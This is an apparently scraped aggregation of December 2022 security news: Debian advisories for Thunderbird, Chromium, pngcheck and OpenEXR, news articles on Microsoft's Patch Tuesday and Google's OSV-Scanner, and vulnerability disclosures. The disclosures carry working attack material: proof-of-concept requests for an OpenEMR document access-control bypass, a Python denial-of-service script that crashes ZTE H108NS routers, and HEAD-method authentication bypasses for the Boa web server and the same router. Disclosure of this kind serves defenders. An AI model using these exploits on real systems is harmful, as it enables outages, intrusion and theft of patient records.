Debian Linux Security Advisory 5303-1 - Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5303-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 16, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2022-46882 CVE-2022-46881 CVE-2022-46880 CVE-2022-46878                 CVE-2022-46874 CVE-2022-46872 CVE-2022-45414Multiple security issues were discovered in Thunderbird, which couldresult in the execution of arbitrary code or information disclosure.For the stable distribution (bullseye), this problem has been fixed inversion 1:102.6.0-1~deb11u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOcwVkACgkQEMKTtsN8TjYhNA//e9mQQto3dcqum+DpkqlxnQ0oJZW90A4qnpdorbSH6AuQodiaMXYrhZ1y7LaCCZd2LgxwIOoW5ukYto7TGGWA+bU8VtdivVKEVJ52dwyzFhp1PMhn81Lr+DRgNf9vYTGO3MYnThKckNhkGPN2qQtxABoBA+opJJIFq7yJW34NEhhWNoH0ubGmCie/13l5msZmN1pYALhsDs1Li7yotVtIRU6r5/t4BUwI0hyfLaR0HDcpeT8iAnyuedMcXF+jFF0B8HQfkakNOc4fODcpiNVW6FAezRPprCTCqpuIr8Ic7yrYWYlAjayLRBbp277JXESFk16Oao/OR0Qf4SpfhDCw3IZwG6A0De4e7nVxunIkjShU9tfzjx5LPeiGqQkXiS2abklARfRUqFeqPFQJbF+CA7lHZiCWm/LXtOjArkIvZ7j1BNcdPmhe/OAJ04zi1j2aKxNxvKAwBK065N1pSn9iS9zvGva7rcenKYnd8kkdExHSnWCCuo79otgKWQ6az/zIdfwY8MU7xxCo04pNnBH+fUAk4sDZGzjfebuqWuUZQ6KK1uo0w6Ji10zriQ2bJ94eYuptBEZttovyjj7SbOAuAB2zpchHT2TlifpgoTmywRNsMceqDNvzbgTCwMEP30TYXOyiunxOs2AgL/6hFAfZ3oTfpxqjuscKCkfi1pwaYjM=YY+h-----END PGP SIGNATURE-----

Debian Security Advisory 5303-1

Debian Linux Security Advisory 5302-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5302-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 16, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2022-4436 CVE-2022-4437 CVE-2022-4438 CVE-2022-4439                 CVE-2022-4440Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 108.0.5359.124-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOcwUwACgkQEMKTtsN8TjaEDhAAuNgbC9i9I5soJN7677urAmv/mzR20/hpcEx4WlrS5YlCMBISsolvytNClMnzfVIe8e0akdshGTtGmehUco7gxXRq7Ab+kCDMFgXrPCf+SDXFbECLR/xtrTGuahzPmrDBwz/5O3gOFcJaEhXoLUER1Xm2UX8MgMlV/pfv8UN0keXriJSS/nWVU5sp8UCfafYxa/cNB51k7VmQTEDL56zcE64zZxXmmfNDvNv9/FHiMHZyATZv499nfEVaI0qvLot/trilA2X6/Wn5aFJD7cRk7PWJR6fzMs36Ad4E9Ww5/mDy6ADKORyRhiHbpw+wRCgs253pkDvwExVTwu2BGsXp9ThnVIHRXflN0GaixsDUryA3x0IRCTiWpNU+armowtAS7I31kht91uPhJaaK3DoB/xgqRbNBHeZnl8NqAaf76ODSGAbjcoUxLXrEb+zD9dLbFuDnfapfeqKCDuZAkeBv9k9etvMTuBTb4KjvA/OfhFTYpF8EJ2+o4RTBqf2vNlEWhSLqXY/ehr6LygFnHlBnrR+SQPUfEQywHEMRa+4DqyWtf25mZKkVl1AdhMqXBF6Rsht0UBOUu2M2g4NOtk/1S34EhPeEhZLSh+Z3XhoIj/UfQLcOgMEQCBHuz1S5tXyLqQCwbpi/Pm+lSI99fPooTH5UoJpDj2cGygXfNysjKq0=kfqY-----END PGP SIGNATURE-----

Debian Security Advisory 5302-1

Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.2.

**Description**

An authenticated user without document access has the ability to direct access any document in the system by using a url similar to this http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19. The autoincrement identifier was also susceptible of being bruteforced for both patient_id and document_id.

A second instance allowed an authenticated user without document access to upload file to any user repository.

**Proof of Concept**

The first one allows any user to access a document by referencing the patient_id and document_id:

    http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19
    

The second instance affected the upload functionality. The following example illustrates the situation:

    POST /openemr/controller.php?document&upload&patient_id=2&parent_id=1& HTTP/1.1
    Host: REDACTED
    (...snip...)
    Upgrade-Insecure-Requests: 1
    
    -----------------------------247482557730593022112237721191
    Content-Disposition: form-data; name="MAX_FILE_SIZE"
    
    64000000
    -----------------------------247482557730593022112237721191
    Content-Disposition: form-data; name="file[]"; filename="testBAC.txt"
    Content-Type: text/plain
    
    TESTFILE
    -----------------------------247482557730593022112237721191
    Content-Disposition: form-data; name="dicom_folder[]"; filename=""
    Content-Type: application/octet-stream
    
    (...snip...)
    -----------------------------247482557730593022112237721191--
    

The response displayed a message saying Documents Not Authorized, but the file was successfully uploaded:

    REQUEST:
    GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=23&as_file=false HTTP/1.1
    (...snip...)
    
    RESPONSE:
    HTTP/1.1 200 OK
    Date: Fri, 07 Oct 2022 16:07:36 GMT
    Server: Apache/2.4.54 (Debian)
    Expires: 0
    Cache-Control: must-revalidate, post-check=0, pre-check=0
    Pragma: public
    Content-Description: File Transfer
    Content-Transfer-Encoding: binary
    Content-Disposition: inline; filename="testBAC.txt"
    Content-Length: 8
    Connection: close
    Content-Type: text/plain;charset=utf-8
    
    TESTFILE
    

**Impact**

Any user with access to the platform would be able to bypass document access restrictions and download any document related to any user in the system. It was also possible to inject document to any patient that could leverage malicious data used as valid medical data.

**Occurrences**

CVE-2022-4567: Broken Access Controls in Patient Files in openemr

Tech giant Microsoft released its last set of monthly security updates for 2022 with fixes for 49 vulnerabilities across its software products.
Of the 49 bugs, six are rated Critical, 40 are rated Important, and three are rated Moderate in severity. The updates are in addition to 24 vulnerabilities that have been addressed in the Chromium-based Edge browser since the start of the month.

Patch Management / Vulnerability

Tech giant Microsoft released its last set of monthly security updates for 2022 with fixes for 49 vulnerabilities across its software products.

Of the 49 bugs, six are rated Critical, 40 are rated Important, and three are rated Moderate in severity. The updates are in addition to 24 vulnerabilities that have been addressed in the Chromium-based Edge browser since the start of the month.

December's Patch Tuesday plugs two zero-day vulnerabilities, one that's actively exploited and another issue that's listed as publicly disclosed at the time of release.

The former relates to CVE-2022-44698 (CVSS score: 5.4), one of the three security bypass issues in Windows SmartScreen that could be exploited by a malicious actor to evade mark of the web (MotW) protections.

It's worth noting that this issue, in conjunction with CVE-2022-41091 (CVSS score: 5.4), has been observed being exploited by Magniber ransomware actors to deliver rogue JavaScript files within ZIP archives.

"It allows attackers to craft documents that won't get tagged with Microsoft's 'Mark of the Web' despite being downloaded from untrusted sites," Rapid7's Greg Wiseman said. "This means no Protected View for Microsoft Office documents, making it easier to get users to do sketchy things like execute malicious macros."

Publicly disclosed, but not seen actively exploited, is CVE-2022-44710 (CVSS score: 7.8), an elevation of privilege flaw in DirectX Graphics Kernel that could enable an adversary to gain SYSTEM privileges.

"Successful exploitation of this vulnerability requires an attacker to win a race condition," Microsoft pointed out in an advisory.

Also patched by Microsoft are multiple remote code execution bugs in Microsoft Dynamics NAV, Microsoft SharePoint Server, PowerShell, Windows Secure Socket Tunneling Protocol (SSTP), .NET Framework, Contacts, and Terminal.

Furthermore, the update also resolves 11 remote code execution vulnerabilities in Microsoft Office Graphics, OneNote, and Visio, all of which are rated 7.8 in the CVSS scoring system.

Two of the 19 elevation of privilege flaws remediated this month comprises fixes for the Windows Print Spooler component (CVE-2022-44678 and CVE-2022-44681, CVSS scores: 7.8), continuing a steady stream of patches released by the company over the past year.

Last but not least, Microsoft has assigned the "Exploitation More Likely" tag to the PowerShell remote code execution vulnerability (CVE-2022-41076, CVSS score: 8.5) and Windows Sysmon privilege escalation flaw (CVE-2022-44704, CVSS score: 7.8), making it essential that users apply updates to mitigate potential threats.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past two weeks to rectify several vulnerabilities, including —

*   Adobe
*   Android
*   Apple
*   Cisco
*   Citrix
*   CODESYS
*   Dell
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Intel
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NVIDIA
*   Qualcomm
*   SAP
*   Schneider Electric
*   Siemens
*   Sophos
*   Trend Micro, and
*   VMware

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

December 2022 Patch Tuesday: Get Latest Security Updates from Microsoft and More

Google on Tuesday announced the open source availability of OSV-Scanner, a scanner that aims to offer easy access to vulnerability information about various projects.
The Go-based tool, powered by the Open Source Vulnerabilities (OSV) database, is designed to connect "a project's list of dependencies with the vulnerabilities that affect them," Google software engineer Rex Pan in a post shared

Open Source / Vulnerability Database

Google on Tuesday announced the open source availability of **OSV-Scanner**, a scanner that aims to offer easy access to vulnerability information about various projects.

The Go-based tool, powered by the Open Source Vulnerabilities (OSV) database, is designed to connect "a project's list of dependencies with the vulnerabilities that affect them," Google software engineer Rex Pan in a post shared with The Hacker News.

"The OSV-Scanner generates reliable, high-quality vulnerability information that closes the gap between a developer's list of packages and the information in vulnerability databases," Pan added.

The idea is to identify all the transitive dependencies of a project and highlight relevant vulnerabilities using data pulled from OSV.dev database.

Google further stated that the open source platform supports 16 ecosystems, counting all major languages, Linux distributions (Debian and Alpine), as well as Android, Linux Kernel, and OSS-Fuzz.

The result of this expansion is that OSV.dev is a repository to more than 38,000 advisories, up from 15,000 security alerts a year ago, with Linux (27.4%), Debian (23.2%), PyPI (9.5%), Alpine (7.9%), and npm (7.1%) taking up the top five slots.

As for the next steps, the internet giant noted it's working to incorporate support for C/C++ flaws by building a "high quality database" that involves adding "precise commit level metadata to CVEs."

\\

OSV-Scanner arrives nearly two months after Google launched GUAC – short for Graph for Understanding Artifact Composition – to complement Supply chain Levels for Software Artifacts (SLSA or "salsa") as part of its efforts to harden software supply chain security.

Last week, Google also published a new "Perspectives on Security" report calling on organizations to develop and deploy a common SLSA framework to prevent tampering, improve integrity, and secure packages against potential threats.

Other recommendations laid out by the company include taking on additional open source security responsibilities and adopting a more holistic approach to addressing risks such as those presented by the Log4j vulnerability and the SolarWinds incident in recent years.

"Software supply chain attacks typically require strong technical aptitude and long-term commitment to pull off," the company said. "Sophisticated actors are more likely to have both the intent and capability to conduct these types of attacks."

"Most organizations are vulnerable to software supply chain attacks because attackers take the time to target third-party providers with trusted connections to their customers' networks. They then use that trust to burrow deeper into the networks of their ultimate targets."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Launches Largest Distributed Database of Open Source Vulnerabilities

Debian Linux Security Advisory 5300-1 - Multiple security issues were discovered in pngcheck, a tool to verify the integrity of PNG, JNG and MNG files, which could potentially result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5300-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 12, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : pngcheckCVE ID         : CVE-2020-35511Multiple security issues were discovered in pngcheck, a tool to verifythe integrity of PNG, JNG and MNG files, which could potentially resultin the execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 3.0.3-1~deb11u1.We recommend that you upgrade your pngcheck packages.For the detailed security status of pngcheck please refer toits security tracker page at:https://security-tracker.debian.org/tracker/pngcheckFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOXol0ACgkQEMKTtsN8TjaLrA//UKv7QUjBuJzwxy0kVrxAvH+xDT4N61NBlVDAerMncxxjb3BBWDYWEzHLJ/Utw3XYQYQjnffXPRJiCruH8bFdDmD18vqMCoUGDo6CTFT/pyQqFxncZu13IQvV1LjgnVraaJa/TQ1BrH8+p8O8X+jqC0f9CThV20qatvxXbgmQkevXHIJTwEw3wxXUaW9Mn3zInZBmkqQKsRaTnd+ydOdwD6MUDVPj/3FuSTLiOv7kV3cyzBB3lZV/7NoxLw9KBoTHttc4rPd/u6XYdG5Xc+VOGnYhqLyF8cxQbzi1/HaTZn/ItuGmCrHe6eFm5VgMI0RutukvFSWuMPIf1MKgvBco3UppSCKUOpJvBNWOmt8uV4eRJgQvx399FyWkwpocub1cUSaLdigcd8oTDj6xqi8TpCOXW6fQiVu7pIxeQEcJWHAiiL/T82kbUBJ3zXOMWMsOwYjdxujC095480gjENVqVoAq41cN0J/xroBXFVAxVZXLxaGrrRjAzdLhc2AHWhFXWESCzBFHV2OM5gxtQUpYLPdICYvNTRXxNXhT3VZOZBTJy0cYQrtAwRQyE//3agQDzRVpJxte6BbLxOl92C+WZicpbiUyzv3a96QM12R3RQy2A6WiXeQ4L6xHTnvIe7RN2cS9Gl/z0NnY6d9yz3Ay6kAB7o62e3GqDNchtXp0Ers=ppOy-----END PGP SIGNATURE-----

Debian Security Advisory 5300-1

Boa Web Server versions 0.94.13 through 0.94.14 fail to validate the correct security constraint on the HEAD HTTP method allowing everyone to bypass the Basic Authorization mechanism.

    # Exploit Title: Boa Web Server 0.94.13-0.94.14 Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://github.com/gpg/boa# CVE: N/A # Tested on: Debian 5.18.5Description :Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate thecorrect security constraint on the HEAD http method allowing everyoneto bypass the Basic Authorization Mechanism.Culprit :if (!memcmp(req->logline, "GET ", 4))req->method = M_GET;else if (!memcmp(req->logline, "HEAD ", 5))/* head is just get w/no body */req->method = M_HEAD;else if (!memcmp(req->logline, "POST ", 5))req->method = M_POST;else {log_error_doc(req);fprintf(stderr, "malformed request: \"%s\"\n", req->logline);send_r_not_implemented(req);return 0;}The req->method = M_HEAD; is being parsed directly  on the  response.cfile, looking at how the method is being implemented for one of theresponse codes :/* R_NOT_IMP: 505 */void send_r_bad_version(request * req){    SQUASH_KA(req);    req->response_status = R_BAD_VERSION;    if (!req->simple) {        req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n");        print_http_headers(req);        req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminateheader */    }    if (req->method != M_HEAD) {        req_write(req,                  "<HTML><HEAD><TITLE>505 HTTP Version NotSupported</TITLE></HEAD>\n"                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTPversions "                  "other than 0.9 and 1.0 "                  "are not supported in Boa.\n<p><p>Version encountered: ");        req_write(req, req->http_version);        req_write(req, "<p><p></BODY></HTML>\n");    }    req_flush(req);}Above code condition indicates that if (req->method != M_HEAD)  thereforeif the the requested method does not equal to M_HEAD thenreq_write(req,                  "<HTML><HEAD><TITLE>505 HTTP Version NotSupported</TITLE></HEAD>\n"                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTPversions "                  "other than 0.9 and 1.0 "                  "are not supported in Boa.\n<p><p>Version encountered: ");        req_write(req, req->http_version);        req_write(req, "<p><p></BODY></HTML>\n");    }So if the method actually contains the http method of HEAD it's beingpassed  for every function that includes all the response code methods.

CVE-2022-45956: Boa Web Server 0.94.13 / 0.94.14 Authentication Bypass ≈ Packet Storm

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 is vulnerable to remote stack buffer overflow.

    # Exploit Title: Router ZTE-H108NS - Stack Buffer Overflow (DoS)# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# Usage: python zte-exploit.py <victim-ip> <port># CVE: N/A # Tested on: Debian 5.18.5#!/usr/bin/python3import sysimport socketfrom time import sleephost = sys.argv[1]  # Recieve IP from userport = int(sys.argv[2])  # Recieve Port from userjunk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"* 5buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"+ junk + b"&TestBtn=START HTTP/1.1\r\n"buffer += b"Host: 192.168.1.1\r\n"buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)Gecko/20100101 Firefox/91.0\r\n"buffer += b"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"buffer += b"Accept-Language: en-US,en;q=0.5\r\n"buffer += b"Accept-Encoding: gzip, deflate\r\n"buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"buffer += b"Connection: Keep-Alive\r\n"buffer += b"Cookie:SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"print("[*] Sending evil payload...")s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))s.send(buffer)sleep(1)s.close()print("[+] Crashing boom boom ~ check if target is down ;)")

CVE-2022-45957: ZTE ZXHN-H108NS Stack Buffer Overflow

    # Exploit Title: Router ZTE-H108NS - Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# CVE: N/A # Tested on: Debian 5.18.5Description :When specific http methods are listed within a security constraint,then only thosemethods are protected. Router ZTE-H108NS defines the following httpmethods: GET, POST, and HEAD. HEAD method seems to fall under a flawedoperation which allows the HEAD to be implemented correctly with everyResponse Status Code.Proof Of Concept :Below request bypasses successfully the Basic Authentication, andgrants access to the Administration Panel of the Router.HEAD /cgi-bin/tools_admin.asp  HTTP/1.1Host: 192.168.1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: SESSIONID=1cd6bb77Upgrade-Insecure-Requests: 1Cache-Control: max-age=0

CVE-2022-45957: ZTE ZXHN-H108NS Authentication Bypass ≈ Packet Storm

Debian Linux Security Advisory 5299-1 - Multiple security vulnerabilities have been found in OpenEXR, command-line tools and a library for the OpenEXR image format. Buffer overflows or out-of-bound reads could lead to a denial of service (application crash) if a malformed image file is processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5299-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
December 10, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openexr  
CVE ID         : CVE-2021-3598 CVE-2021-3605 CVE-2021-3933 CVE-2021-3941  
                 CVE-2021-23215 CVE-2021-26260 CVE-2021-45942  
Debian Bug     : 992703 990450 990899 1014828 1014828

Multiple security vulnerabilities have been found in OpenEXR, command-line  
tools and a library for the OpenEXR image format. Buffer overflows or  
out-of-bound reads could lead to a denial of service (application crash) if a  
malformed image file is processed.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.5.4-2+deb11u1.

We recommend that you upgrade your openexr packages.

For the detailed security status of openexr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openexr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmOUsp1fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeSfCg/9GD/cedF6yXuvTz4E68wdwJSZD+FVs840/miN6I0VBtvaApLUVZbyHd2w  
6SjC0G3qdmG8UkczUM/+YFl6O1D6qfLcr4vtZwqgu6SzG9wiA5CyogE1afe9ff1d  
bmS7/zv+WZEUUY9oC+px6yLLKOozsiHJlHB1FWcLaYWj+oFGVs83+PU5deErBCXY  
bbcR0pv+dMAnodhsyCmLr34nyaPfXUzdEI0cdXA63jJm/hOZAlDkUXLddljBCSDt  
GqhNbGDMdgitgxGgYC0MgduaOjprtzxdIJ7KRv4hLJiQB3P3oC2YyyxtCGFRLtKW  
X936b8AdGmUjzWeKURogRTuPDaZkO4DRQOZErBrYyxl2tCs4G29b/PQoO/0tPMlM  
aAH3ccT1FaSg2StM7VmfYaq8Fom7xoDbkEc76+ZSj3E6khhaZpRE2KENm9k042OE  
3y4UQXqYhF/8YKE6WLWBrPhj9kYVHXIBFyKuuZlLXkG2rYsa9Mx11MXfNtRto5ml  
8GITQNB53z+LwVmuFVwkBN1wLDJdGpEvuvsm2+xwzvyAtKYPDWIavuoWbIgHeMur  
7YS8ZGswgyzbDeMx/DsL+9ZGycIddZFddsE8Ag9fBlYrwIs26kBqGN3Zn9ELOVmW  
/w2jcYgAWV9HRxobpP4i73cmPsg7thBSEseeN5ypNYGZSMNWS50=  
=S4Eq  
-----END PGP SIGNATURE-----

Tag

#debian